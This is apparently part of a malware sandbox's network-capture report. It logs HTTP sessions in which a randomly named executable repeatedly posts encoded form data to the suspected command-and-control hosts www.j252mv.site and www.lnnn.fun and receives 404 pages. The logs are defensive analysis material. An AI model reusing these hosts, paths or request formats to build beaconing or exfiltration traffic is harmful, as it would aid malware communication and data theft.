                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 7, 2024 15:51:25.339797974 CET | 237 bytes | IN | Data Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        15 | 192.168.2.10 | 49988 | 150.95.254.168 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:26.988409996 CET | 1804 bytes | OUT | POST /bjtw/ HTTP/1.1
                                                        Host: www.j252mv.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.j252mv.site
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.j252mv.site/bjtw/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 52 75 6c 4e 68 4b 56 6c 37 54 49 33 44 72 72 6c 72 35 37 74 36 72 65 4e 54 33 37 35 49 4c 59 74 6e 37 5a 6f 6a 77 52 61 4c 42 56 6c 6d 69 5a 77 45 5a 70 52 72 57 4b 69 4a 76 36 41 44 59 78 6b 7a 31 39 65 34 4f 33 57 43 66 45 42 38 42 44 5a 37 69 68 68 57 34 64 37 2b 76 57 41 47 76 36 71 42 6e 6f 4c 65 7a 36 52 6f 69 71 55 32 65 4d 66 76 61 30 4a 77 70 38 4f 77 79 69 35 33 32 6f 6b 4c 37 5a 75 78 33 75 42 58 42 52 4e 78 79 46 77 6d 68 77 42 4f 31 65 36 56 50 2b 4e 6f 66 56 53 70 5a 77 37 7a 61 49 76 73 6a 6a 62 42 53 52 69 4e 66 61 2b 35 79 75 4e 79 44 69 46 44 4c 42 38 2b 4b 7a 36 37 67 70 75 75 6f 73 65 38 77 36 54 56 34 2b 36 6b 2f 63 51 62 67 49 34 6f 6d 4f 50 38 37 33 30 65 69 2f 46 44 76 37 79 44 78 61 74 45 51 54 7a 38 53 62 5a 4a 43 64 4e 39 72 32 4d 4a 74 78 70 6e 43 44 50 42 30 74 38 34 33 44 64 69 50 7a 33 53 54 79 37 75 51 75 58 31 57 46 70 78 78 4f 68 79 69 39 72 36 50 52 30 78 6a 42 74 34 37 51 62 53 77 51 57 4c 76 4b 54 73 31 6f 49 51 4b 43 73 57 63 64 59 68 6d 78 6a 56 [TRUNCATED]
                                                        Data Ascii: eL-x=RulNhKVl7TI3Drrlr57t6reNT375ILYtn7ZojwRaLBVlmiZwEZpRrWKiJv6ADYxkz19e4O3WCfEB8BDZ7ihhW4d7+vWAGv6qBnoLez6RoiqU2eMfva0Jwp8Owyi532okL7Zux3uBXBRNxyFwmhwBO1e6VP+NofVSpZw7zaIvsjjbBSRiNfa+5yuNyDiFDLB8+Kz67gpuuose8w6TV4+6k/cQbgI4omOP8730ei/FDv7yDxatEQTz8SbZJCdN9r2MJtxpnCDPB0t843DdiPz3STy7uQuX1WFpxxOhyi9r6PR0xjBt47QbSwQWLvKTs1oIQKCsWcdYhmxjVa71UcyE3EpZ7MpuQ8nW74r7lAVXkc9DEIpMN+lXKR1Sgnm7PIqaV4CTYMIDxlOc9GAAAjPrCIgTLpeBZLy8i4W9OW6FnXTG3yy1vm6fl0tkf3PmpmMKmdv1yEWYltTItwuQ8Z+IBtkzVUf++u5uYCmu+x6y147Sgv+M4Q81w8sukD1D7fF8EMySdg2SdEbC/XVFzzUFKmQ/7tj8mNcnaVm4ltda+g64FO2aP5K88BCyMlCBWlqOoCo5Kne0uoVrFP8TG0XuPj68YIWSxHjURpLt2FuYPJZeRUryK6IABAMV3JwLNDRshCLRXSwPuKuQCufi7D3xAwkDCXmjgVLGLNOzJeHYmW989EsMWGxgnIickto9QPvmQk0hBT+n3nJnzW10wbWtrjSvq5IQL3s+Fu5yqi0CbcjEoSC4gImUilFUA7Hgsi5jH8h3WtE1WYALD/mQ5wditLIHf4GR7n6j8dlDE8OuQ0maH5JezEs+ja/DrDuGqtypPaJb0y5kvNprwUt20vkOCBccPcq9a09hpO2AGRB2ribd8QqUJFX6lfSkBd3UmGsji1NiS3GMMDXPLccXc4ER99KXw/MczJkki2hA/HMDm7vjRYkNALmA3aqTdOwbzaUmnE2GP2rqI3HgnVLBVwzmVzLy+8jLj+M83mRZCizrE3PIvvt [TRUNCATED]
                                                        Nov 7, 2024 15:51:27.860903978 CET | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:27 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 7, 2024 15:51:27.861690044 CET | 237 bytes | IN | Data Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        16 | 192.168.2.10 | 49989 | 150.95.254.168 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:29.528069019 CET | 515 bytes | OUT | GET /bjtw/?eL-x=csNti9Ni0CMSF+Luu5Lb4YGLWTncdI4NtLZHzGNdKQ96nntWCfQjnA+gcdSxDY8YzUt2/7rDdvxAnlLOvCpJP4lTvOHTPP+iYlkpfhDtlBKj7b5q5w==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.j252mv.site
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:51:30.407376051 CET | 1236 bytes | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:30 GMT
                                                        Server: Apache
                                                        Last-Modified: Tue, 13 Sep 2022 05:17:25 GMT
                                                        Accept-Ranges: bytes
                                                        Content-Length: 1260
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 [TRUNCATED]
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Style-Type" content="text/css"><meta http-equiv="Content-Script-Type" content="text/javascript"><title>404 Error - Not Found</title><style type="text/css"></style></head><body><div id="contents"><center><h1><img src="http://www.gmo.jp/images/public/common/logo.gif" alt="GMO Internet, Inc."></h1><div id="main"><h1 class="title">404 Error - Not Found</h1><p class="detail">URL</p></br></br></br></br></br><a style="text-decoration: underline;" href="http://www.onamae-server.com/" target="_blank">.com </a> </div><div id="footer"></br><a href="http://www.onamae.com/?banner_id=634" target="_blank"> [TRUNCATED]
                                                        Nov 7, 2024 15:51:30.407434940 CET | 237 bytes | IN | Data Raw: 81 aa e3 82 89 e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 26 6c 74 3b 50 52 26 67 74 3b 3c 2f 61 3e 0a 3c 68 34 20 63 6c 61 73 73 3d 22 63 6d 6e 6d 22 3e 47 4d 4f e3 82 a4 e3 83 b3 e3 82 bf e3 83 bc e3 83 8d e3 83 83 e3 83 88 e3 82 b0 e3 83 ab e3 83
                                                        Data Ascii: .com&lt;PR&gt;</a><h4 class="cmnm">GMO</h4><div align="center"><p>Copyright (c) GMO Internet Group, Inc. All Rights Reserved.</p></div></center></div></div></body></html>


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        17 | 192.168.2.10 | 49990 | 188.114.96.3 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:35.669001102 CET | 758 bytes | OUT | POST /u5w9/ HTTP/1.1
                                                        Host: www.lnnn.fun
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lnnn.fun
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 193
                                                        Referer: http://www.lnnn.fun/u5w9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4e 31 6a 4f 75 34 67 54 52 78 75 33 63 43 4c 33 47 6e 48 72 41 35 52 6c 4c 74 63 6c 44 49 31 75 30 77 30 57 57 2f 77 79 6c 33 69 61 63 34 51 69 51 4c 46 35 6a 73 39 4c 79 54 32 44 39 47 6b 4d 72 31 6f 38 48 39 56 6b 57 66 63 6e 57 61 30 6f 6f 46 39 62 73 6e 65 64 72 62 34 59 67 4f 63 4c 36 6b 4b 30 74 52 6e 62 6e 4f 47 78 57 2f 39 57 6d 57 4f 76 58 51 6e 70 57 77 2f 76 64 50 58 53 72 62 39 44 71 36 6e 64 71 7a 59 4e 68 59 34 44 77 50 42 46 64 67 5a 46 48 31 4c 55 67 76 69 68 67 48 31 4f 33 39 31 6e 5a 46 5a 6f 42 6c 56 49 38 4e 64 39 46 61 36 63 75 6b 63 6a
                                                        Data Ascii: eL-x=N1jOu4gTRxu3cCL3GnHrA5RlLtclDI1u0w0WW/wyl3iac4QiQLF5js9LyT2D9GkMr1o8H9VkWfcnWa0ooF9bsnedrb4YgOcL6kK0tRnbnOGxW/9WmWOvXQnpWw/vdPXSrb9Dq6ndqzYNhY4DwPBFdgZFH1LUgvihgH1O391nZFZoBlVI8Nd9Fa6cukcj
                                                        Nov 7, 2024 15:51:36.983582973 CET | 866 bytes | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:36 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cLiuIp9HcEQPY7hN%2FKJsx3f1DHr3StLqSez%2B7Z1neRXJMz%2BvqB4lxxgIjm9PeCVIbOWNqi5IlrAN0EVTgOsIIWksLBQIvDN9tNv08Cgns2yDYkIwSc6QYnJ4re%2Fwfqc%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee246f2a3f2c8d-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1230&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b b1 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 2f 35 2d b7 d4 57 28 4f 2c 56 c8 cb 2f 51 48 03 29 55 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 fa b4 bc 15 48 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 5a0/Qp/K0HU(J-,M-.IMQQ/5-W(O,V/QH)US(,V(N-*K-H0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        18 | 192.168.2.10 | 49991 | 188.114.96.3 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:38.205995083 CET | 782 bytes | OUT | POST /u5w9/ HTTP/1.1
                                                        Host: www.lnnn.fun
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lnnn.fun
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 217
                                                        Referer: http://www.lnnn.fun/u5w9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4e 31 6a 4f 75 34 67 54 52 78 75 33 64 69 37 33 4b 6b 76 72 52 4a 52 6d 53 64 63 6c 4a 6f 30 47 30 77 77 57 57 2b 46 33 6c 46 32 61 63 5a 67 69 42 36 46 35 69 73 39 4c 71 44 32 43 7a 6d 6b 54 72 31 31 4c 48 2f 42 6b 57 66 34 6e 57 66 49 6f 6f 32 6c 55 76 58 65 66 6a 37 34 57 75 75 63 4c 36 6b 4b 30 74 52 79 4f 6e 50 69 78 57 4c 35 57 67 33 4f 6f 55 51 6e 71 62 67 2f 76 4f 66 58 57 72 62 38 57 71 2f 2f 33 71 32 55 4e 68 64 63 44 77 39 70 4b 58 67 5a 48 4b 56 4b 63 6a 38 58 37 6e 32 59 32 2f 4d 31 4c 4e 45 6c 34 50 6b 6f 50 74 63 38 71 57 74 6d 53 67 69 70 4a 6d 70 71 43 49 48 4f 38 33 4e 6b 52 53 49 41 71 4a 4f 78 7a 61 77 3d 3d
                                                        Data Ascii: eL-x=N1jOu4gTRxu3di73KkvrRJRmSdclJo0G0wwWW+F3lF2acZgiB6F5is9LqD2CzmkTr11LH/BkWf4nWfIoo2lUvXefj74WuucL6kK0tRyOnPixWL5Wg3OoUQnqbg/vOfXWrb8Wq//3q2UNhdcDw9pKXgZHKVKcj8X7n2Y2/M1LNEl4PkoPtc8qWtmSgipJmpqCIHO83NkRSIAqJOxzaw==
                                                        Nov 7, 2024 15:51:39.472732067 CET | 858 bytes | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:39 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sRxxn1pXSDSA587GpSj90oPYxzGyveokoLtTkYyVRy1nq0NLpSZ7kFrJLNqIn6fTWk33gkp1aNqSH3WB3KKNZicB7zbDS7bH4TtPmC77q2ftmHXOU3MNflD2NNwQwpo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee247f1b5947a5-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=782&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 35 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 f3 cb 2f 51 70 cb 2f cd 4b b1 d1 cf 30 b4 0b c9 48 55 28 4a 2d 2c 4d 2d 2e 49 4d 51 08 0d f2 51 d0 2f 35 2d b7 d4 57 28 4f 2c 56 c8 cb 2f 51 48 03 29 55 c8 cf 53 28 c9 c8 2c 56 28 4e 2d 2a 4b 2d d2 03 00 fa b4 bc 15 48 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 5a0/Qp/K0HU(J-,M-.IMQQ/5-W(O,V/QH)US(,V(N-*K-H0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                        19 | 192.168.2.10 | 49992 | 188.114.96.3 | 80 | 6584 | C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:40.758377075 CET | 1795 bytes | OUT | POST /u5w9/ HTTP/1.1
                                                        Host: www.lnnn.fun
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate
                                                        Origin: http://www.lnnn.fun
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: no-cache
                                                        Connection: close
                                                        Content-Length: 1229
                                                        Referer: http://www.lnnn.fun/u5w9/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Data Raw: 65 4c 2d 78 3d 4e 31 6a 4f 75 34 67 54 52 78 75 33 64 69 37 33 4b 6b 76 72 52 4a 52 6d 53 64 63 6c 4a 6f 30 47 30 77 77 57 57 2b 46 33 6c 46 75 61 63 72 6f 69 51 70 39 35 68 73 39 4c 30 54 32 66 7a 6d 6b 61 72 31 39 48 48 2f 4e 30 57 64 51 6e 51 35 38 6f 6b 54 52 55 34 6e 65 66 68 37 34 62 67 4f 63 6b 36 69 71 34 74 52 69 4f 6e 50 69 78 57 4b 4a 57 6a 6d 4f 6f 62 77 6e 70 57 77 2f 7a 64 50 57 78 72 62 30 47 71 2f 4c 4e 71 6c 63 4e 67 37 38 44 79 75 42 4b 66 67 5a 2f 4a 56 4b 74 6a 38 4b 6c 6e 79 42 50 2f 4d 41 75 4e 48 31 34 4e 46 5a 6a 70 49 49 38 49 72 2b 31 2b 68 5a 72 73 75 71 58 42 6d 37 50 77 73 4e 4a 49 49 4a 49 64 61 6f 6a 42 77 71 6d 2f 39 49 58 6b 62 7a 30 62 46 41 77 30 6e 2f 56 71 53 70 44 62 42 2f 64 32 4b 6d 76 55 56 39 52 41 75 65 69 59 78 4f 59 66 6b 65 58 4f 55 34 4c 38 76 41 6e 6d 31 46 58 75 61 71 68 4e 7a 51 76 48 7a 6d 71 48 37 65 41 56 30 34 49 48 6e 5a 62 30 34 6e 65 73 70 54 4d 33 4a 62 57 73 45 79 79 4e 44 38 2f 2f 78 54 78 45 32 35 33 35 6a 50 67 7a 58 6e 63 46 58 70 6c 78 [TRUNCATED]
                                                        Data Ascii: eL-x=N1jOu4gTRxu3di73KkvrRJRmSdclJo0G0wwWW+F3lFuacroiQp95hs9L0T2fzmkar19HH/N0WdQnQ58okTRU4nefh74bgOck6iq4tRiOnPixWKJWjmOobwnpWw/zdPWxrb0Gq/LNqlcNg78DyuBKfgZ/JVKtj8KlnyBP/MAuNH14NFZjpII8Ir+1+hZrsuqXBm7PwsNJIIJIdaojBwqm/9IXkbz0bFAw0n/VqSpDbB/d2KmvUV9RAueiYxOYfkeXOU4L8vAnm1FXuaqhNzQvHzmqH7eAV04IHnZb04nespTM3JbWsEyyND8//xTxE2535jPgzXncFXplx [TRUNCATED]
                                                        Nov 7, 2024 15:51:42.018539906 CET | 870 bytes | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:41 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PJLK%2Fxikx%2FDcvxx5Jc8gZS9Qy2wWd0K%2Bw7xLJ6%2Fwn348Zk8gVZEB5r1W4a0%2FtSpFjMbZzaUIdnMuRceUCUjGCOEsp5ddzUbwBwAs%2FqUz%2BZP%2FPq0DArsiNzZ37ZNOjSw%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee248f0b2e3acc-DFW
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1406&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1795&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Nov 7, 2024 15:51:42.024770975 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session ID: 20 | Source IP: 192.168.2.10 | Source Port: 49993 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 6584 | Process: C:\Program Files (x86)\KJyPoNHseUIsGMbuwejDQZOKlxCchvdjFeaFGBIvDseKbKAXosLmCyzHBXJZRfvRdvnJXv\avRLXQyosx.exe
                                                        Timestamp | Bytes transferred | Direction | Data
                                                        Nov 7, 2024 15:51:43.292861938 CET | 512 | OUT | GET /u5w9/?eL-x=A3LutOpKcAePelibJkXDDYFDO+A/U7kX8Qw8AI5F82KOCrYaBuw+x7BD9zmk5lVUkEcfBKV2GIclDvoU+V9Cq0mSlb4StpI39XWYwC+owI+4erZmyw==&wFVH=-zwTKPF0iPth HTTP/1.1
                                                        Host: www.lnnn.fun
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
                                                        Nov 7, 2024 15:51:44.726872921 CET | 973 | IN | HTTP/1.1 404 Not Found
                                                        Date: Thu, 07 Nov 2024 14:51:44 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNQc3uvc2%2FuAsP6zaVcAr%2BhmRhWuSGj1ticct0jl4%2Ft65mYmZ1B9MOZ4%2Fnrng2Q1EwIn%2FliL1UlbwyyrrKU6EczUt1iTBieaxAHkSAGQRblKZ8h%2F06yvTc7ztUeXKF0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8dee249f0ee56c31-DFW
                                                        alt-svc: h3=":443"; ma=86400
